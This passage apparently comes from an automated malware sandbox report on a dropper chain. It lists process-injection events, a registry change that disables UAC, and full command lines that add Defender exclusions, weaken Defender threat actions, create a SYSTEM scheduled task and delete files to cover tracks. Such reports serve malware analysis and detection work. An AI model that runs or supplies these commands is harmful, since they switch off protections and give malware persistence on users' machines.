Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1952 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 1952 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 1952 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 1392 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
PID 1392 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
PID 1392 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
PID 5000 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5000 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5000 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5000 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5000 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5000 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5000 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5000 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1392 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
PID 1392 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
PID 1392 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
PID 4208 wrote to memory of 3728 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
PID 4208 wrote to memory of 3728 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
PID 4208 wrote to memory of 3728 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
PID 4208 wrote to memory of 4292 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
PID 4208 wrote to memory of 4292 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
PID 1392 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
PID 1392 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
PID 1392 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
PID 1392 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
PID 1392 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
PID 1392 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
PID 3160 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3160 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3160 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3160 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3160 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3160 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3160 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3160 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3160 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1392 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
PID 1392 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
PID 1392 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
PID 4024 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe C:\Windows\system32\WerFault.exe
PID 4024 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe C:\Windows\system32\WerFault.exe
PID 4024 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe C:\Windows\system32\WerFault.exe
PID 4024 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe C:\Windows\system32\WerFault.exe
PID 4024 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe C:\Windows\system32\WerFault.exe
PID 4024 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe C:\Windows\system32\WerFault.exe
PID 4024 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe C:\Windows\system32\WerFault.exe
PID 4024 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe C:\Windows\system32\WerFault.exe
PID 4024 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe C:\Windows\system32\WerFault.exe
PID 1392 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe
PID 1392 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe
PID 2248 wrote to memory of 1548 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\System32\sihclient.exe
PID 2248 wrote to memory of 1548 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\System32\sihclient.exe
PID 2248 wrote to memory of 1548 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\System32\sihclient.exe
PID 1548 wrote to memory of 3708 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe

"C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"

C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe

"C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe

"C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"

C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe

"C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"

C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe

"C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe

"C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe

"C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5000 -ip 5000

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 256

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3260 -ip 3260

C:\Windows\SysWOW64\timeout.exe

timeout /t 5

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 468 -p 3184 -ip 3184

C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe

"C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe" /s

C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe

"C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe"

C:\Users\Admin\Pictures\H0UVbMblodCc40gmvFoORgyt.exe

"C:\Users\Admin\Pictures\H0UVbMblodCc40gmvFoORgyt.exe"

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv MbyfG1aUrky1RXM+asfYGQ.0.2

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\Pictures\360TS_Setup.exe

"C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=

C:\Program Files (x86)\1717037821_0\360TS_Setup.exe

"C:\Program Files (x86)\1717037821_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\system32\bcdedit.exe

"C:\Windows\system32\bcdedit.exe" /set {bootmgr} flightsigning on

C:\Windows\system32\bcdedit.exe

"C:\Windows\system32\bcdedit.exe" /set flightsigning on

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\360\Total Security\MenuEx64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\360\Total Security\MenuEx64.dll"

C:\Program Files (x86)\360\Total Security\Utils\PowerSaver.exe

"C:\Program Files (x86)\360\Total Security\Utils\PowerSaver.exe" /flightsigning

C:\Program Files (x86)\360\Total Security\safemon\WscReg.exe

"C:\Program Files (x86)\360\Total Security\safemon\WscReg.exe" /installsrv

C:\Program Files (x86)\360\Total Security\safemon\WscReg.exe

"C:\Program Files (x86)\360\Total Security\safemon\WscReg.exe"

C:\Program Files (x86)\360\Total Security\SoftMgr\EaInstHelper64.exe

"C:\Program Files (x86)\360\Total Security\SoftMgr\EaInstHelper64.exe" /Install_run

C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe

"C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe" /install

C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe

"C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe

/showtrayicon

C:\Program Files (x86)\360\Total Security\safemon\QHWatchdog.exe

"C:\Program Files (x86)\360\Total Security\safemon\QHWatchdog.exe" /install

C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe

"C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe" /cleantip=1

C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe

"C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe" /ExShowTrayIcon

C:\Windows\SysWOW64\regsvr32.exe

C:\Windows\system32\regsvr32.exe /s "C:\Program Files (x86)\360\Total Security\safemon\safemon.dll"

C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe

"C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe" /ExShowTrayIcon

C:\Program Files (x86)\360\Total Security\safemon\QHWatchdog.exe

"C:\Program Files (x86)\360\Total Security\safemon\QHWatchdog.exe" /watch

C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe

"C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe"

C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe

"C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe authroots.sst

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe updroots.sst

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe -l roots.sst

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe -d delroots.sst

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\360\Total Security\safemon\bdfltlib.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\360\Total Security\safemon\scan.dll"

C:\Users\Admin\Pictures\wD2dhV3FhycNZg6ppID8rOZD.exe

"C:\Users\Admin\Pictures\wD2dhV3FhycNZg6ppID8rOZD.exe"

C:\Users\Admin\AppData\Local\Temp\7zSB35D.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe

.\Install.exe /NQHxdidUQs "385118" /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bqGGCwwWIommTRgeuN" /SC once /ST 02:58:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe\" 1g /fJvdidJshn 385118 /S" /V1 /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bqGGCwwWIommTRgeuN"

C:\Windows\SysWOW64\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn bqGGCwwWIommTRgeuN

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn bqGGCwwWIommTRgeuN

C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe 1g /fJvdidJshn 385118 /S

C:\Windows\SysWOW64\cmd.exe

